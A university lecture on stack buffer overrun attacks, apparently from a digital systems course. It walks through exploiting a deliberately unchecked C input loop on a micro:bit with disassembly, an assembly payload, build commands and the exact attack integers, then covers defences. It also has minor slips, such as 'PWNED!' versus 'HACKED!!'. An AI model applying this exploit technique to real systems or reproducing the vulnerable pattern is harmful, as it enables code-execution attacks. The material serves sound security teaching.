Lecture 7 – Buffer overrun attacks (Digital Systems)
The victim
One day, an Oxford undergraduate was conscientiously doing his IP1 practical, using C and the micro:bit instead of Scala and some bloated AMD64 machine with gigabytes of RAM. Here is the code that he wrote:
/* getnum -- read a line of input and convert to a number */ int getnum(void) { char buf[64]; getline(buf); return atoi(buf); } void init(void) { int n = 0, total; int data[10]; serial_init(); printf("Enter numbers, 0 to finish\n"); while (1) { int x = getnum(); if (x == 0) break; data[n++] = x; } total = 0; for (int i = 0; i < n; i++) total += data[i]; printf("Total = %d\n", total); }
That doesn't look too bad, does it? There's a subroutine getnum
that reads a line of input and converts it into a number, and the main program uses it to read a sequence of numbers and store them in an array. Finally, the program adds together all of the numbers and prints the total. But already this program contains a horrendous bug, which will allow us, by feeding it carefully crafted input, to subvert it and run any code that we like. To show our power, we will force the program to print the string PWNED!
.
The flaw in the program is that it doesn't check that the input contains at most 10 numbers, and continues to accept and store numbers even when the array is full. It is this weakness we shall exploit.
Context
This sort of sloppy programming is very common in C. It does little damage if the program is quickly written, used only locally, and quickly discarded. In other contexts, as we'll see, more care is very much needed to avoid security problems. There is actually another, more insidious, problem in the program, and that is the interface of the routinegetline
, which takes as a parameter the address of a character array to store the line, but has no what of knowing how big that array is, and so cannot guard against overflowing it. Routines in the C library such as gets
– the same as getline
here – are rightly deprecated for their unsafety. There's an alternative function fgets(buf, n, fp)
that can read from an arbitrary file fp
, not just the standard input, but crucially also accepts the maximum number of characters n
that will fit in buf
.Mounting the attack
Used ordinarily, the program fulfils its purpose.
Enter numbers, ending with 0 > 123 > 456 > 7 > 0 Total = 586
After printing the total, the program ends, and we must press reset to use it again. But now let's try another sequence of 14 numbers.
Enter numbers, ending with 0 > -1610370930 > 1200113921 > 59387 > 1217 > 1262698824 > 555828293 > 32 > 1 > 1 > 1 > 1 > 1 > 1 > 536887217 > 0
As you will see, the program runs hayware, printing the same message over and over again. (In the lecture, I used a helper program squirt
running on the host computer to automate typing in the numbers – but given enough patience it can be done by hand.)
Analysing the attack
So what are those 14 magic numbers, and how were they determined?
First, we notice that there are 14 numbers, and the buffer declared locally in init
has space for only 10 numbers. The first 10 numbers that are input fill up the data
array, and the remaining four are written by the program into the space beyond the array, overwriting whatever the program was storing there. To understand what is overwritten, and how this leads to subversion of the program, we need to look at the layout of init
's stack frame.
+--------------------------------+ | Return address | +--------------------------------+ | Saved R5 value | +--------------------------------+ | Saved R4 value | +--------------------------------+ | One word of padding | +--------------------------------+ | | | 10 words for data array | sp: | | +--------------------------------+
We can deduce the layout of init
's frame by looking at its code, obtained by disassembling the program. The code begins like this:
00000224 <init>: 224: b530 push {r4, r5, lr} 226: b08b sub sp, #44 ; 0x2c 228: f7ff ff4a bl c0 <serial_init> 22c: 480d ldr r0, [pc, #52] ; (264 <init+0x40>) 22e: f000 f947 bl 4c0 <printf> 232: 2400 movs r4, #0 234: f7ff ffec bl 210 <getnum> 238: 2800 cmp r0, #0 23a: d004 beq.n 246 <init+0x22> 23c: 00a3 lsls r3, r4, #2 23e: 466a mov r2, sp 240: 5098 str r0, [r3, r2] 242: 3401 adds r4, #1 244: e7f6 b.n 234 <init+0x10>
The function begins by saving three registers, then subtracting 44 from the stack pointer, enough space for the 40-byte data
array, plus four bytes of padding that are included so as to keep the stack pointer a multiple of eight in obedience to the ARM calling convention.
The local variable n
lives in register r4
, and later in the function, the statement data[n++] = x
is translated into the four instructions starting with lsls
at address 0x23c
: first r3
is set to 4*n
, then r2
is set to the value of sp
, and x
, currently resident in r0
is stored into an address formed by adding r2
and r3
, just as we would expect if the array begins at the stack pointer as the picture shows.
Is it fair to disassemble the target program and use this information to mount our attack? Yes, of course: in real life, we might be attacking a particular release of [a popular web browser], and we can download the code and study it to our heart's content, EULA notwithstanding.
Ok, we will make our attack string contain 10 integers to fill up the buffer, another three integers to overwrite the next three words of the stack, and then one more integer that will overwrite the return address of init
with a value of our choosing. By doing this, we can arrange that when init
returns, it will be to a place that we can control. We'll choose that place to be the buffer itself, and arrange that the data put in the buffer is the code we'd like to run. But where will the buffer be in memory? We can find that out by running the program on a test machine with the debugger, stopping it in init
, and writing down the value of the stack pointer. That will allow us to calculate the address of each part of our attack string once it is copied into the data
array by the victim. In a more complicated program, different calls to init
might be made in different contexts, and there may be several possible values for the stack pointer; here there is only one.
The layout we plan for the attack string is like this:
40 bytes of code Another 12 bytes of padding Address of the code
There's one more piece of information we need to formulate the attack string, and that's the address of the subroutine printf
, which we can use to print our message (and a ransom note). We can find that by disassembling the program or by looking in the map file output by the linker. If our target is open source, we can get all this information freely; if not, we might need to poke about a bit more with a disassembler, but it's not rocket science.
After the stack frame of init
has been overwritten by the input loop, the rest of init
runs as usual: the total of the 14 numbers we have input is computed and printed. Then init
returns to our chosen return address, and the code we placed in the buffer starts to run.
Context
The layout of the stack frame forinit
is typical of many machines. Details will differ: for example, we can expect the return address to appear at different offsets from the start of the buffer. What most buffer overrun attacks have in common is that the return address of a subroutine can be overwritten by overflowing a buffer embedded in the stack frame.Building a binary
We could piece together the attack string byte by byte, hardware manual in hand. But it's neater to use the assembler: here's the assembly language source for what we want, including the addresses we determined earlier:
.equ printf, 0x4c0 @ Address of printf .equ frame, 0x20003fb0 @ Captured stack pointer value in init .text attack: sub sp, #56 @ 0: Reserve stack space again again: adr r0, message @ 2: Address of our message ldr r1, =printf+1 @ 4: Absolute address for call blx r1 @ 6: Call printf b again @ 8: Spin forever .pool @ 12: constant pool message: .asciz "HACKED!! " @ 16: string -- 10 bytes .balign 4, 0 @ pad to 28 bytes .word 1, 1, 1, 1 @ 28: fill up to 44 bytes .word 1, 1 @ 44: Saved r4, r5 .word frame+1 @ 52: Faked return address @ Total size 56
By the time this code is reached, init
will have deallocated the stack space that was used for the buffer, so the first task is to adjust the stack pointer, so that when we later call printf
, its stack frame will not overwrite our code. Then there is a call that passes the message to printf
, for simplicity calling it by first putting its absolute address in a register; the +1
is to mark it as Thumb code.[1] Then the code enters an infinite loop while we wait for the ransom to be sent – in Bitcoin, naturally.
Some details to dispel any mystery:
- The
adr
instruction assembles into an instructionadd r0, pc, #n
that setsr0
to the address of the message: the assembler determines the value ofn
. - The directive
.pool
places the constantprintf+1
here in memory and fixes up the earlierldr =
instruction to refer to it. - The directive
.asciz
stores the characters of our message, terminated C-style with a zero byte. - The directive
.align 5, 0
pads the program with zero bytes (0
) until its size is a multiple of 32 = 25. - Each
.word
directive contributes a four-byte word to the output of the assembler. - The
.equ
directives give the numeric value of the symbolsprintf
andframe
, obtained in earlier experiments. - We use a
blx reg
instruction instead ofbl label
just because it's marginally inconvenient to determine the displacement forbl
, and an absolute address is easier to deal with.
There's a makefile that automates the process of building the demonstration. First, we can assemble the file attack.s
into an object file attack.o
.
arm-none-eabi-as -mcpu=cortex-m0 -mthumb attack.s -o attack.o
Next, we use objcopy
to turn the .o
file into a binary image.
arm-none-eabi-objcopy -O binary attack.o attack.bin
Then we can use the (slightly misnamed) hexdump
utility to format the binary data as a sequence of decimal integers.
hexdump -v -e '/4 "%d\n"' attack.bin >attack
The file attack
then contains the ten lines shown earlier as input to the milk bill program. There's a little program squirt
that tuns on the host and outputs the text like keystrokes to the serial interface of the micro:bit.
Disassembling the file attack.o
shows the correspondence between the input to the assembler and the 14 integers that make up the attack string.
00000000 <attack>: 0: b08e sub sp, #56 ; 0x38 2: a003 add r0, pc, #12 ; (adr r0, 10 <message>) 4: 4901 ldr r1, [pc, #4] ; (c <attack+0xc>) 6: 4788 blx r1 8: e7fb b.n 2 <attack+0x2> a: 0000 .short 0x0000 c: 000004c1 .word 0x000004c1 00000010 <message>: 10: 4b434148 .word 0x4b434148 14: 21214445 .word 0x21214445 18: 00000020 .word 0x00000020 1c: 00000001 .word 0x00000001 20: 00000001 .word 0x00000001 24: 00000001 .word 0x00000001 28: 00000001 .word 0x00000001 2c: 00000001 .word 0x00000001 30: 00000001 .word 0x00000001 34: 20003fb1 .word 0x20003fb1
For example, the first integer is -1610370930, and that is the (signed) value of the bitstring 0xa003b08e
.
It's possible to use the debugger to capture the precise moment when the pc
jumps to an unexpected value. Another page has a (manual) script to follow.
Defence against the dark arts
This example shows just how easy it is to write code with accidental vulnerabilities. There are many things that can be done to prevent such vulnerabilities from being exposed.
- We could use a programming language that supports checking of array bounds, and makes it difficult to pass around the addresses of buffers without also passing and checking their size.
- This attack depends on executing code that has been received as data: in the example, that code is stored in the region of memory that is used for the stack. On machines more sophisticated than the micro:bit, it's often possible to forbid executing code from anywhere but the code segment of the program.
- Even microcontrollers that have separate address spaces for program and data make it difficult to accidentally execute data as instructions. Nevertheless, there has to be some way of doing it, or such microcontrollers would not be able to update their own firmware under program control, and that is a useful feature.
- The attack depended on knowing a couple of addresses – the address of the
getnum
stack frame and the address of the existingprintf
subroutine. By randomising the layout of memory for each run of the program, it can be made more difficult to predict where such things will be found.
Linux has some at least of these defences enabled by default and repeating the attack there is rather more difficult.
- ↑ That is to say, the
blx r1
instruction on bigger ARM processors is capable of switching between Native ARM and Thumb modes, according to the least significant bit in the registerr1
– that is the significance of thex
in the mnemonicblx
. The functionprintf
is in Thumb code, so even on the Cortex-M0, we must carefully keep the processor in Thumb mode when calling it: hence the+1
. For the same reason, the return address we plant in place ofgetnum
's original return address also has a+1
.